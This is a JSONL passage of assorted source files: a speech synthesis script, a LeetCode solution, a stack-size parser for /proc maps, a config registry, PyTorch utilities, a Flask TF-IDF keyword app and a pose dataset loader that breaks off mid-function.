+{"seq_id":"222636780","text":"#!/usr/bin/env python\n# -*- encoding: utf-8 -*-\n'''\n@File : train-duration.py\n@Date : 2021/01/05, Tue\n@Author : Atomicoo\n@Version : 1.0\n@Contact : atomicoo95@gmail.com\n@License : (C)Copyright 2020-2021, ShiGroup-NLP-XMU\n@Desc : Synthetize sentences into speech.\n'''\n\n__author__ = 'Atomicoo'\n\nimport argparse\nimport os\nimport os.path as osp\nimport time\nfrom scipy.io.wavfile import write\n\nimport torch\nfrom utils.hparams import HParam\nfrom utils.transform import StandardNorm\nfrom helpers.synthesizer import Synthesizer\nimport vocoder.models\nfrom vocoder.layers import PQMF\nfrom utils.audio import dynamic_range_decompression\nfrom datasets.dataset import TextProcessor\nfrom models import ParallelText2Mel\n\nfrom utils.utils import select_device, get_last_chkpt_path\ntry:\n from helpers.manager import GPUManager\nexcept ImportError as err:\n print(err); gm = None\nelse:\n gm = GPUManager()\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description=__doc__, formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n parser.add_argument(\"--batch_size\", default=8, type=int, help=\"Batch size\")\n parser.add_argument(\"--checkpoint\", default=None, type=str, help=\"Checkpoint file path\")\n parser.add_argument(\"--melgan_checkpoint\", default=None, type=str, help=\"Checkpoint file path of melgan\")\n parser.add_argument(\"--input_texts\", default=None, type=str, help=\"Input text file path\")\n parser.add_argument(\"--outputs_dir\", default=None, type=str, help=\"Output wave file directory\")\n parser.add_argument(\"--device\", default=None, help=\"cuda device or cpu\")\n parser.add_argument(\"--name\", default=\"parallel\", type=str, help=\"Append to logdir name\")\n parser.add_argument(\"--config\", default=None, type=str, help=\"Config file path\")\n args = parser.parse_args()\n\n if torch.cuda.is_available():\n index = args.device if args.device else str(0 if gm is None else gm.auto_choice())\n else:\n index = 'cpu'\n device = select_device(index)\n\n hparams = HParam(args.config) \\\n if args.config else HParam(osp.join(osp.abspath(os.getcwd()), \"config\", \"default.yaml\"))\n\n logdir = osp.join(hparams.trainer.logdir, f\"%s-%s\" % (hparams.data.dataset, args.name))\n checkpoint = args.checkpoint or get_last_chkpt_path(logdir)\n\n normalizer = StandardNorm(hparams.audio.spec_mean, hparams.audio.spec_std)\n processor = TextProcessor(hparams.text)\n text2mel = ParallelText2Mel(hparams.parallel)\n text2mel.eval()\n\n synthesizer = Synthesizer(\n model=text2mel,\n checkpoint=checkpoint,\n processor=processor,\n normalizer=normalizer,\n device=device\n )\n\n print('Synthesizing...')\n since = time.time()\n text_file = args.input_texts or hparams.synthesizer.inputs_file_path\n with open(text_file, 'r', encoding='utf-8') as fr:\n texts = fr.read().strip().split('\\n')\n melspecs = synthesizer.inference(texts)\n print(f\"Inference {len(texts)} spectrograms, total elapsed {time.time()-since:.3f}s. Done.\")\n\n vocoder_checkpoint = args.melgan_checkpoint or \\\n osp.join(hparams.trainer.logdir, f\"{hparams.data.dataset}-melgan\", hparams.melgan.checkpoint)\n ckpt = torch.load(vocoder_checkpoint, map_location=device)\n\n # Ref: https://github.com/kan-bayashi/ParallelWaveGAN/issues/169\n decompressed = dynamic_range_decompression(melspecs)\n decompressed_log10 = torch.log10(decompressed)\n mu = torch.tensor(ckpt['stats']['mu']).to(device).unsqueeze(1)\n var = torch.tensor(ckpt['stats']['var']).to(device).unsqueeze(1)\n sigma = torch.sqrt(var)\n melspecs = (decompressed_log10 - mu) / sigma\n\n Generator = getattr(vocoder.models, ckpt['gtype'])\n\n vocoder = Generator(**ckpt['config']).to(device)\n vocoder.remove_weight_norm()\n if ckpt['config']['out_channels'] > 1:\n vocoder.pqmf = PQMF().to(device)\n vocoder.load_state_dict(ckpt['model'])\n\n if ckpt['config']['out_channels'] > 1:\n waves = vocoder.pqmf.synthesis(vocoder(melspecs)).squeeze(1)\n else:\n waves = vocoder(melspecs).squeeze(1)\n print(f\"Generate {len(texts)} audios, total elapsed {time.time()-since:.3f}s. Done.\")\n\n print('Saving audio...')\n outputs_dir = args.outputs_dir or hparams.synthesizer.outputs_dir\n os.makedirs(outputs_dir, exist_ok=True)\n for i, wav in enumerate(waves, start=1):\n wav = wav.cpu().detach().numpy()\n filename = osp.join(outputs_dir, f\"{time.strftime('%Y-%m-%d')}_{i:03d}.wav\")\n write(filename, hparams.audio.sampling_rate, wav)\n print(f\"Audios saved to {outputs_dir}. Done.\")\n\n print(f'Done. ({time.time()-since:.3f}s)')\n \n","sub_path":"synthesize.wave.py","file_name":"synthesize.wave.py","file_ext":"py","file_size_in_byte":4661,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"645493347","text":"class Solution(object):\n def sumOddLengthSubarrays(self, arr):\n \"\"\"\n :type arr: List[int]\n :rtype: int\n \"\"\"\n pref = [0]\n for i in arr:\n pref.append(pref[-1]+i)\n ans = 0\n for i in range((len(arr)+1)//2):\n step = 2*i+1\n for j in range(len(pref)-step):\n ans += (pref[j+step]-pref[j])\n return ans\n# Runtime: 44 ms, faster than 82.47% of Python online submissions for Sum of All Odd Length Subarrays.\n# Memory Usage: 13.4 MB, less than 44.20% of Python online submissions for Sum of All Odd Length Subarrays.","sub_path":"1588. Sum of All Odd Length Subarrays.py","file_name":"1588. Sum of All Odd Length Subarrays.py","file_ext":"py","file_size_in_byte":617,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"427581455","text":"Bbuf = (\t'\\x81' \t\t\t# Message Type 'B'\n\t+ chr(0b01010011) \t# Status 1, No lock, Same/Both, fork mode off, transmitter on\n\t+ chr(0b01000100) \t# Status 2, No fast speed locked, faster enabled, no low volt\n\t+ '\\x31\\x31\\x31' \t# Patrol Speed, 111\n\t+ '\\x32\\x32\\x32' \t# Locked Speed, 222\n\t+ '\\x33\\x33\\x33' \t# Faster speed, 333\n\t+ '\\x34\\x34\\x34' \t# Target speed, 444\n\t+ '\\x0D'\t\t# Carriage return\n\t)\n\n","sub_path":"speedsensor/testBsentence.py","file_name":"testBsentence.py","file_ext":"py","file_size_in_byte":391,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"390461599","text":"#!/usr/bin/python\n\nimport sys\nimport re\n\npid = int(sys.argv[1])\nstack_alloc_size = int(sys.argv[2])\ncounter = int(sys.argv[3])\n\n\nMAPS_LINE_RE = re.compile(r\"\"\"\n (?P[0-9a-f]+)-(?P[0-9a-f]+)\\s+ # Address\n (?P\\S+)\\s+ # Permissions\n (?P[0-9a-f]+)\\s+ # Map offset\n (?P\\S+)\\s+ # Device node\n (?P\\d+)\\s+ # Inode\n (\\[stack\\].*)\\s+ # Pathname\n\"\"\", re.VERBOSE)\n\n\nwith open(\"/proc/%d/maps\" % pid) as fd:\n for line in fd:\n m = MAPS_LINE_RE.match(line)\n if not m:\n continue\n addr_start, addr_end, perms, offset, dev, inode, pathname = m.groups()\n stack_size = int(addr_end, 16) - int(addr_start, 16)\n print(\"{},{},{}\".format(counter, stack_alloc_size, stack_size))\n","sub_path":"08-analysis/stack-alloc-maps/parse-maps.py","file_name":"parse-maps.py","file_ext":"py","file_size_in_byte":942,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"487292413","text":"__version__ = \"0.0.7\"\n\nimport oyaml as yaml\nimport types\nimport copy\nfrom .template import expand, gather_hparams_from_config, construct_expname, _contains_hparam_key, _strip_off_hparam_key\nimport traceback\nfrom pprint import pprint\nimport functools\nfrom reprlib import repr\nimport inspect\n\nMODULES = {}\n\n\nclass Configurable:\n def __init__(self, f, *args, **kwargs):\n self.f = f\n self.initial_args = args\n self.initial_kwargs = kwargs\n\n def __call__(self, *new_args, **new_kwargs):\n new_kwargs = dict() if new_kwargs is None else new_kwargs\n\n if len(new_kwargs) > 0:\n updated_kwargs = copy.copy(self.initial_kwargs)\n updated_kwargs.update(new_kwargs)\n else:\n updated_kwargs = self.initial_kwargs\n\n return self.f(*new_args, *self.initial_args, **updated_kwargs)\n\n\ndef check():\n return {\n \"num_modules\": len(MODULES),\n \"keys\": list(MODULES)\n }\n\n\ndef check_registered():\n print(\"################################################################\")\n print(\"Printing registered modules: \")\n for module_key, module in sorted(MODULES.items(), key=lambda kv: kv[0]):\n print(f\"{module_key:24}{module}\")\n print(\"################################################################\")\n\n\ndef quick_register(module):\n name = module.__name__\n if name in MODULES:\n try:\n is_same_module = inspect.getsourcefile(module) == inspect.getsourcefile(MODULES[name])\n except:\n print(\"Make sure module {} is not being overloaded!\".format(name))\n is_same_module = module.__dict__.keys() == MODULES[name].__dict__.keys()\n if is_same_module:\n print(\"The module {} is already registered. \".format(name))\n else:\n print(\"A different module with name {} is already registered. \".format(name))\n print(f\"Module repr is {MODULES[name].__repr__}\")\n raise NameError\n try:\n MODULES[name] = module\n except Exception as e:\n print(\"Exception: \\n{}\".format(e))\n print(\"Traceback: \\n{}\".format(traceback.print_exc()))\n print(\"Message: Couldn't find module named {} to load\".format(name))\n\n return module\n\n\ndef register(name=None):\n assert name not in MODULES, \"The module with {} is already registered. \".format(name)\n names = [name]\n\n def core(module):\n name = names[0]\n if name is None:\n name = module.__name__\n MODULES[name] = module\n return module\n\n return core\n\n\ndef get(name):\n try:\n return MODULES[name]\n except Exception as e:\n print(\"\\nSpaghettini Message: Module '{}' not registered. \\n\".format(name))\n raise\n\n\ndef configure(d, record_config=False, verbose=False):\n if type(d) == dict:\n # Strip off the hparam string from the key, if it exists.\n cleaned_d = dict()\n for key, value in d.items():\n if _contains_hparam_key(key):\n key = _strip_off_hparam_key(key)\n cleaned_d[key] = value\n d = cleaned_d\n\n new_d = {}\n for key, value in d.items():\n if key.startswith(\"[\") and key.endswith(\"]\"):\n for k, v in value.items():\n assert k not in new_d\n new_d[k] = v\n else:\n new_d[key] = value\n d = new_d\n\n assert \"\" in d, d\n m = get(d[\"\"])\n\n def core(*args, **kwargs):\n configure_fn = functools.partial(configure, record_config=record_config, verbose=verbose)\n extra_kwargs = {k: configure_fn(d[k]) for k in filter(lambda x:\n (not x.endswith(\">\") and not x.startswith(\"<\")), d)}\n if \"\" in d:\n extra_args = tuple(map(configure_fn, d[\"\"]))\n else:\n extra_args = tuple()\n try:\n # v = m(*args, *extra_args, **kwargs, **extra_kwargs)\n v = Configurable(f=m, *args, *extra_args, **kwargs, **extra_kwargs)\n except Exception as e:\n print(e)\n print(\"\\nException occured while loading {}.\\n\".format(d[\"\"]))\n raise\n\n if record_config:\n v.__config__ = d\n if verbose:\n print(\">>>> Instantiating module: {}\".format(m))\n print(\"Arguments:\")\n for i, arg in enumerate(tuple(args + extra_args)):\n print(\"\\tArgument {}: {}\".format(i, arg))\n print(\"Keyword arguments:\")\n for curr_key, curr_value in sorted(dict(**kwargs, **extra_kwargs).items(), key=lambda kv: kv[0]):\n print(\"\\tKey: {}\\n\\t\\t Value: {}\".format(curr_key, repr(curr_value)))\n print(\"<<<<\")\n return v\n\n if \"\" in d and d[\"\"]:\n return core()()\n return core()\n if type(d) == list:\n return list(map(configure, d))\n return d\n\n\ndef load(path, gather_hparams=False, verbose=False, record_config=True):\n if path.endswith(\"yaml\"):\n with open(path, \"r\") as f:\n x = yaml.safe_load(f)\n if verbose:\n print(\">>>>>>>> Configuring from '{}'. \".format(path))\n\n # Configure the modules.\n configured = configure(x, record_config=record_config, verbose=verbose)\n\n # Gather the hyperparameters.\n hparams_dict = dict()\n gather_hparams_from_config(x, hparams_dict)\n\n # Construct experiment name.\n exp_name = construct_expname(hparams_dict)\n\n # Return.\n return configured, exp_name if not gather_hparams else (configured, exp_name, hparams_dict)\n\n return None\n\n\ndef clear_registered_modules():\n print(\"This function is not debugged yet. \")\n MODULES = dict()\n","sub_path":"spaghettini/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":5883,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"304589173","text":"import matplotlib.pyplot as plt\r\nimport os\r\nfrom torchvision import transforms, utils\r\nimport torch\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nfrom utils.utils_file import get_cur_time_stamp, create_folder\r\n\r\ndef compute_differentiable_params(net):\r\n return sum(p.numel() for p in net.parameters() if p.requires_grad)\r\n\r\ndef convert_Relight_latent_light(latent_feature):\r\n \"\"\" Convert n x 6 x 16 x 16 -> n x 3 x 16 x 32 \"\"\"\r\n # torch image: C X H X W\r\n batch_size, C, H, W = latent_feature.size()\r\n latent_feature = torch.reshape(latent_feature, (batch_size, 3, 16, 32)) # make sure it is right\r\n # print(latent_feature.size())\r\n return latent_feature\r\n\r\ndef show_batch(sample_batch, out_file=None):\r\n grid = utils.make_grid(sample_batch)\r\n plt.figure(figsize=(30,20))\r\n plt.imshow(grid.detach().cpu().numpy().transpose((1,2,0)))\r\n\r\n if not out_file is None:\r\n print('try save ', out_file)\r\n plt.savefig(out_file)\r\n\r\n plt.show()\r\n\r\ndef show_light_batch(light_batch):\r\n light_batch = convert_Relight_latent_light(light_batch)\r\n show_batch(light_batch)\r\n \r\ndef save_loss(figure_fname, train_loss, valid_loss):\r\n plt.plot(train_loss)\r\n plt.plot(valid_loss)\r\n plt.legend(['train_loss', 'valid_loss'])\r\n plt.savefig(figure_fname)\r\n\r\ndef save_model(output_folder, model, optimizer, epoch, best_loss, exp_name, hist_train_loss, hist_valid_loss, hist_lr, params):\r\n \"\"\" Save current best model into some folder \"\"\"\r\n create_folder(output_folder)\r\n\r\n cur_time_stamp = get_cur_time_stamp()\r\n output_fname = os.path.join(output_folder, exp_name + '_' + cur_time_stamp + \".pt\")\r\n\r\n tmp_model = model\r\n if params.multi_gpu and hasattr(tmp_model, 'module'):\r\n tmp_model = model.module\r\n\r\n torch.save({\r\n 'epoch': epoch,\r\n 'best_loss': best_loss,\r\n 'model_state_dict': tmp_model.state_dict(),\r\n 'optimizer_state_dict': optimizer.state_dict(),\r\n 'hist_train_loss': hist_train_loss,\r\n 'hist_valid_loss': hist_valid_loss,\r\n 'hist_lr':hist_lr,\r\n 'params':str(params)\r\n }, output_fname)\r\n return output_fname\r\n \r\ndef get_lr(optimizer):\r\n for param_group in optimizer.param_groups:\r\n return param_group['lr']\r\n\r\ndef set_lr(optimizer, lr):\r\n for param_group in optimizer.param_groups:\r\n param_group['lr'] = lr","sub_path":"utils/net_utils.py","file_name":"net_utils.py","file_ext":"py","file_size_in_byte":2387,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"428645308","text":"class User:\n def __init__(self,name,email,account_number):\n self.name = name\n self.email = email\n self.account_number = account_number\n self.balance = 0\n def make_deposit(self,deposit_amount):\n if deposit_amount < 0:\n print(\"Please enter correct number.\")\n else:\n self.balance += deposit_amount\n print(f\"{self.name} has deposited {deposit_amount} into account successfully.\")\n return self\n def make_withdrawal(self, withdraw_amount):\n if self.balance < withdraw_amount:\n print(\"Withdraw exceeds balance and please check\")\n else:\n self.balance -= withdraw_amount\n print(f\"{self.name} has withdrawed {withdraw_amount} from account successfully.\")\n return self\n def display_user_balance(self):\n print(f\"User: {self.name}, Balance: {self.balance}\")\n def transfer_money(self, other_user, transfer_amount):\n if transfer_amount > self.balance:\n print(\"Transfer amount exceeds balance and please check.\")\n elif transfer_amount <= 0:\n print(\"Transfer amount can't be negative or zero.\")\n elif not other_user:\n print(\"User to be transfered doesn't exist. Please check username.\")\n else:\n self.balance -= transfer_amount\n other_user.balance += transfer_amount\n print(f\"{transfer_amount} has been transfered to {other_user.name} successfully.\")\n return self\n\nuser1 = User(\"Tom\",\"tom@gmail.com\",\"1234\")\nuser2 = User(\"John\",\"john@gmail.com\",\"5678\")\nuser3 = User(\"Amy\",\"amy@gmail.com\",\"91011\")\nuser1.make_deposit(1000).make_deposit(3000).make_deposit(4000).make_withdrawal(2000).display_user_balance()\nuser2.make_deposit(3000).make_deposit(2500).make_withdrawal(1300).display_user_balance()\nuser3.make_deposit(2000).make_withdrawal(500).make_withdrawal(1000).make_withdrawal(1500).display_user_balance()\nuser1.transfer_money(user3, 2000).display_user_balance()\nuser3.display_user_balance()","sub_path":"fundamentals/OOP/chaining_method.py","file_name":"chaining_method.py","file_ext":"py","file_size_in_byte":2033,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"46175268","text":"import pandas as pd\nimport re\nimport json\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.feature_extraction.text import TfidfTransformer\nfrom flask import Flask, jsonify, request, render_template, redirect, url_for\n\napp = Flask(__name__)\n\n\ndef pre_process(text):\n \n # lowercase\n text=text.lower()\n \n #remove tags\n text=re.sub(\"\",\" <> \",text)\n \n # remove special characters and digits\n text=re.sub(\"(\\\\d|\\\\W)+\",\" \",text)\n \n return text\n \ndef get_stop_words(stop_file_path):\n \"\"\"load stop words \"\"\"\n \n with open(stop_file_path, 'r', encoding=\"utf-8\") as f:\n stopwords = f.readlines()\n stop_set = set(m.strip() for m in stopwords)\n return frozenset(stop_set) \n\ndef sort_coo(coo_matrix):\n tuples = zip(coo_matrix.col, coo_matrix.data)\n return sorted(tuples, key=lambda x: (x[1], x[0]), reverse=True)\n\ndef extract_topn_from_vector(feature_names, sorted_items, topn=10):\n \"\"\"get the feature names and tf-idf score of top n items\"\"\"\n \n #use only topn items from vector\n sorted_items = sorted_items[:topn]\n\n score_vals = []\n feature_vals = []\n\n for idx, score in sorted_items:\n fname = feature_names[idx]\n \n #keep track of feature name and its corresponding score\n score_vals.append(round(score, 3))\n feature_vals.append(feature_names[idx])\n\n #create a tuples of feature,score\n #results = zip(feature_vals,score_vals)\n results= {}\n for idx in range(len(feature_vals)):\n results[feature_vals[idx]]=score_vals[idx]\n \n return results\n\ndef get_keywords(idx):\n\n #generate tf-idf for the given document\n tf_idf_vector=tfidf_transformer.transform(cv.transform([docs_test[idx]]))\n\n #sort the tf-idf vectors by descending order of scores\n sorted_items=sort_coo(tf_idf_vector.tocoo())\n\n #extract only the top n; n here is 10\n keywords=extract_topn_from_vector(feature_names,sorted_items,10)\n \n return keywords\n\ndef print_results(idx,keywords):\n # now print the results\n print(\"\\n=====Title=====\")\n print(docs_title[idx])\n print(\"\\n=====Body=====\")\n print(docs_body[idx])\n print(\"\\n===Keywords===\")\n for k in keywords:\n print(k,keywords[k]) \n \ndef check_require_skills(keywords, skills):\n for k in keywords:\n for d in skills:\n if k == d:\n return True \n return False \n\n# read json into a dataframe\ndf_idf=pd.read_json(\"static/data/stackoverflow-data-idf.json\",lines=True)\n\n# print schema\nprint(\"Schema:\\n\\n\",df_idf.dtypes)\nprint(\"Number of questions,columns=\",df_idf.shape)\n\ndf_idf['text'] = df_idf['title'] + df_idf['body']\ndf_idf['text'] = df_idf['text'].apply(lambda x:pre_process(x))\n\n#show the first 'text'\ndf_idf['text'][2]\n\n#load a set of stop words\nstopwords=get_stop_words(\"static/resources/stopwords.txt\")\n\n#get the text column \ndocs=df_idf['text'].tolist()\n\n#create a vocabulary of words, \n#ignore words that appear in 85% of documents, \n#eliminate stop words\ncv=CountVectorizer(max_df=0.85,stop_words=stopwords)\nword_count_vector=cv.fit_transform(docs)\n\nword_count_vector.shape\n\ncv=CountVectorizer(max_df=0.85,stop_words=stopwords,max_features=10000)\nword_count_vector=cv.fit_transform(docs)\nword_count_vector.shape\n\nlist(cv.vocabulary_.keys())[:10]\n\nlist(cv.get_feature_names())[2000:2015]\n\ntfidf_transformer=TfidfTransformer(smooth_idf=True,use_idf=True)\ntfidf_transformer.fit(word_count_vector)\n\ntfidf_transformer.idf_\n\n# read test docs into a dataframe and concatenate title and body\ndf_test=pd.read_json(\"static/data/stackoverflow-test.json\",lines=True)\ndf_test['text'] = df_test['title'] + df_test['body']\ndf_test['text'] =df_test['text'].apply(lambda x:pre_process(x))\n\n# get test docs into a list\ndocs_test=df_test['text'].tolist()\ndocs_title=df_test['title'].tolist()\ndocs_body=df_test['body'].tolist()\n \n# you only needs to do this once\nfeature_names=cv.get_feature_names()\n\n# get the document that we want to extract keywords from\ndoc=docs_test[0]\n\n#generate tf-idf for the given document\ntf_idf_vector=tfidf_transformer.transform(cv.transform([doc]))\n\n#sort the tf-idf vectors by descending order of scores\nsorted_items=sort_coo(tf_idf_vector.tocoo())\n\n#extract only the top n; n here is 10\nkeywords=extract_topn_from_vector(feature_names,sorted_items,10)\n\n# now print the results\nprint(\"\\n=====Title=====\")\nprint(docs_title[0])\nprint(\"\\n=====Body=====\")\nprint(docs_body[0])\nprint(\"\\n===Keywords===\")\nfor k in keywords:\n print(k,keywords[k])\n\n\n@app.route('/check', methods=['POST'])\ndef get_require_workers():\n global df_test\n global docs_test\n global docs_title\n global docs_body\n #get request with task description\n title = request.form['Title']\n body = request.form['Body']\n #Update data & get keywords\n with open(\"static/data/stackoverflow-test.json\", mode='r+') as feedsjson:\n feeds = json.load(feedsjson)\n feeds[\"body\"] = body\n feeds[\"title\"] = title\n feedsjson.seek(0)\n feedsjson.write(json.dumps(feeds))\n feedsjson.truncate()\n df_test=pd.read_json(\"static/data/stackoverflow-test.json\",lines=True)\n df_test['text'] = df_test['title'] + df_test['body']\n df_test['text'] =df_test['text'].apply(lambda x:pre_process(x))\n\n # get test docs into a list\n docs_test=df_test['text'].tolist()\n docs_title=df_test['title'].tolist()\n docs_body=df_test['body'].tolist()\n \n idx=0\n keywords=get_keywords(idx)\n print_results(idx,keywords)\n #keywords dictionary for every profession\n data_scientist_words = [\"machine\", \"learning\", \"statistics\", \"algorithms\", \"analyse\"]\n backend_words = [\"server\", \"database\", \"sql\", \"nosql\", \"storage\"]\n frontend_words = [\"web\", \"visualization\", \"form\", \"site\", \"platform\"]\n mobile_words = [\"ios\", \"android\", \"application\", \"mobile\", \"smartphone\", \"iphone\"]\n design_words = [\"visualization\", \"interface\", \"UI\", \"UX\", \"friendly\"]\n #check matches\n data_scientist = check_require_skills(keywords, data_scientist_words)\n backend = check_require_skills(keywords, backend_words)\n frontend = check_require_skills(keywords, frontend_words)\n mobile = check_require_skills(keywords, mobile_words)\n design = check_require_skills(keywords, design_words)\n\n return render_template('requirements.html', title=title, body=body, data_scientist=data_scientist, backend=backend, frontend=frontend, mobile=mobile, design=design)\n\n@app.route(\"/\")\ndef startpage():\n return render_template('index.html')\n\n \nif __name__ == '__main__':\n app.run(debug=True, host='localhost')\n\n","sub_path":"ml/ml.py","file_name":"ml.py","file_ext":"py","file_size_in_byte":6639,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"237691312","text":"from __future__ import division\n\nimport torch\nfrom torch.utils.data import Dataset\nfrom torchvision.transforms import Normalize\nimport numpy as np\nimport cv2\nfrom os.path import join\n\nimport config\nimport constants\nfrom utils.imutils import crop, flip_img, flip_pose, flip_kp, transform, rot_aa\n\nclass BaseJointsDataset(Dataset):\n \"\"\"\n Base Dataset Class - Handles data loading and augmentation.\n Able to handle heterogeneous datasets (different annotations available for different datasets).\n You need to update the path to each dataset in utils/config.py.\n \"\"\"\n\n def __init__(self, options, cfg, dataset, ignore_3d=False, use_augmentation=True, is_train=True):\n super(BaseJointsDataset, self).__init__()\n self.dataset = dataset\n self.is_train = is_train\n self.options = options\n self.img_dir = config.DATASET_FOLDERS[dataset]\n self.normalize_img = Normalize(mean=constants.IMG_NORM_MEAN, std=constants.IMG_NORM_STD)\n self.data = np.load(config.DATASET_FILES[is_train][dataset])\n self.imgname = self.data['imgname']\n self.num_joints = cfg.MODEL.NUM_JOINTS\n\n self.target_type = cfg.MODEL.TARGET_TYPE\n self.image_size = np.array(cfg.MODEL.IMAGE_SIZE)\n self.heatmap_size = np.array(cfg.MODEL.HEATMAP_SIZE)\n self.sigma = cfg.MODEL.SIGMA\n self.use_different_joints_weight = cfg.LOSS.USE_DIFFERENT_JOINTS_WEIGHT\n self.joints_weight = 1\n\n # self.target_type = 'gaussian'\n # self.heatmap_size = [64, 64]\n # self.sigma = 2\n # self.use_different_joints_weight = True\n # self.joints_weight = 1\n\n # Get paths to gt masks, if available\n try:\n self.maskname = self.data['maskname']\n except KeyError:\n pass\n try:\n self.partname = self.data['partname']\n except KeyError:\n pass\n\n # Bounding boxes are assumed to be in the center and scale format\n self.scale = self.data['scale']\n self.center = self.data['center']\n \n # If False, do not do augmentation\n self.use_augmentation = use_augmentation\n \n # Get gt SMPL parameters, if available\n try:\n self.pose = self.data['pose'].astype(np.float)\n self.betas = self.data['shape'].astype(np.float)\n if 'has_smpl' in self.data:\n self.has_smpl = self.data['has_smpl']\n else:\n self.has_smpl = np.ones(len(self.imgname))\n except KeyError:\n self.has_smpl = np.zeros(len(self.imgname))\n if ignore_3d:\n self.has_smpl = np.zeros(len(self.imgname))\n \n # Get gt 3D pose, if available\n try:\n self.pose_3d = self.data['S']\n self.has_pose_3d = 1\n except KeyError:\n self.has_pose_3d = 0\n if ignore_3d:\n self.has_pose_3d = 0\n \n # Get 2D keypoints\n try:\n keypoints_gt = self.data['part']\n except KeyError:\n keypoints_gt = np.zeros((len(self.imgname), 24, 3))\n try:\n keypoints_openpose = self.data['openpose']\n except KeyError:\n keypoints_openpose = np.zeros((len(self.imgname), 25, 3))\n self.keypoints = np.concatenate([keypoints_openpose, keypoints_gt], axis=1)\n\n # Get gender data, if available\n try:\n gender = self.data['gender']\n self.gender = np.array([0 if str(g) == 'm' else 1 for g in gender]).astype(np.int32)\n except KeyError:\n self.gender = -1*np.ones(len(self.imgname)).astype(np.int32)\n \n self.length = self.scale.shape[0]\n\n def augm_params(self):\n \"\"\"Get augmentation parameters.\"\"\"\n flip = 0 # flipping\n pn = np.ones(3) # per channel pixel-noise\n rot = 0 # rotation\n sc = 1 # scaling\n if self.is_train:\n # We flip with probability 1/2\n if np.random.uniform() <= 0.5:\n flip = 1\n \n # Each channel is multiplied with a number \n # in the area [1-opt.noiseFactor,1+opt.noiseFactor]\n pn = np.random.uniform(1-self.options.noise_factor, 1+self.options.noise_factor, 3)\n \n # The rotation is a number in the area [-2*rotFactor, 2*rotFactor]\n rot = min(2*self.options.rot_factor,\n max(-2*self.options.rot_factor, np.random.randn()*self.options.rot_factor))\n \n # The scale is multiplied with a number\n # in the area [1-scaleFactor,1+scaleFactor]\n sc = min(1+self.options.scale_factor,\n max(1-self.options.scale_factor, np.random.randn()*self.options.scale_factor+1))\n # but it is zero with probability 3/5\n if np.random.uniform() <= 0.6:\n rot = 0\n \n return flip, pn, rot, sc\n\n def rgb_processing(self, rgb_img, center, scale, rot, flip, pn):\n \"\"\"Process rgb image and do augmentation.\"\"\"\n rgb_img = crop(rgb_img, center, scale, \n [constants.IMG_RES, constants.IMG_RES], rot=rot)\n # flip the image \n if flip:\n rgb_img = flip_img(rgb_img)\n # in the rgb image we add pixel noise in a channel-wise manner\n rgb_img[:,:,0] = np.minimum(255.0, np.maximum(0.0, rgb_img[:,:,0]*pn[0]))\n rgb_img[:,:,1] = np.minimum(255.0, np.maximum(0.0, rgb_img[:,:,1]*pn[1]))\n rgb_img[:,:,2] = np.minimum(255.0, np.maximum(0.0, rgb_img[:,:,2]*pn[2]))\n # (3,224,224),float,[0,1]\n rgb_img = np.transpose(rgb_img.astype('float32'),(2,0,1))/255.0\n return rgb_img\n\n def j2d_processing(self, kp, center, scale, r, f):\n \"\"\"Process gt 2D keypoints and apply all augmentation transforms.\"\"\"\n nparts = kp.shape[0]\n for i in range(nparts):\n kp[i,0:2] = transform(kp[i,0:2]+1, center, scale, \n [constants.IMG_RES, constants.IMG_RES], rot=r)\n # convert to normalized coordinates\n kp[:,:-1] = 2.*kp[:,:-1]/constants.IMG_RES - 1.\n # flip the x coordinates\n if f:\n kp = flip_kp(kp)\n kp = kp.astype('float32')\n return kp\n\n def j3d_processing(self, S, r, f):\n \"\"\"Process gt 3D keypoints and apply all augmentation transforms.\"\"\"\n # in-plane rotation\n rot_mat = np.eye(3)\n if not r == 0:\n rot_rad = -r * np.pi / 180\n sn,cs = np.sin(rot_rad), np.cos(rot_rad)\n rot_mat[0,:2] = [cs, -sn]\n rot_mat[1,:2] = [sn, cs]\n S[:, :-1] = np.einsum('ij,kj->ki', rot_mat, S[:, :-1]) \n # flip the x coordinates\n if f:\n S = flip_kp(S)\n S = S.astype('float32')\n return S\n\n def pose_processing(self, pose, r, f):\n \"\"\"Process SMPL theta parameters and apply all augmentation transforms.\"\"\"\n # rotation or the pose parameters\n pose[:3] = rot_aa(pose[:3], r)\n # flip the pose parameters\n if f:\n pose = flip_pose(pose)\n # (72),float\n pose = pose.astype('float32')\n return pose\n\n def generate_target(self, keypoints):\n '''\n :param joints: [num_joints, 3]\n :param joints_vis: [num_joints, 3]\n :return: target, target_weight(1: visible, 0: invisible)\n '''\n # print(keypoints)\n keypoints_14 = keypoints[25:39,:]\n # keypoints1 = keypoints.copy()\n # keypoints1[:,:2] = (keypoints1[:,:2] + 1) * constants.IMG_RES / 2 - 1\n # keypoints_14 = keypoints1[25:39,:]\n target_weight = np.ones((keypoints_14.shape[0], 1), dtype=np.float32)\n target_weight[:, 0] = keypoints_14[:, 2]\n\n assert self.target_type == 'gaussian', \\\n 'Only support gaussian map now!'\n\n if self.target_type == 'gaussian':\n target = np.zeros((self.num_joints,\n self.heatmap_size[1],\n self.heatmap_size[0]),\n dtype=np.float32)\n\n tmp_size = self.sigma * 3\n\n # print(keypoints)\n\n for joint_id in range(self.num_joints):\n feat_stride = constants.IMG_RES / self.heatmap_size\n # print(feat_stride)\n # print(keypoints_14[joint_id])\n mu_x = int(keypoints_14[joint_id][0] / feat_stride[0] + 0.5)\n mu_y = int(keypoints_14[joint_id][1] / feat_stride[1] + 0.5)\n # print(mu_x)\n # print(mu_y)\n # Check that any part of the 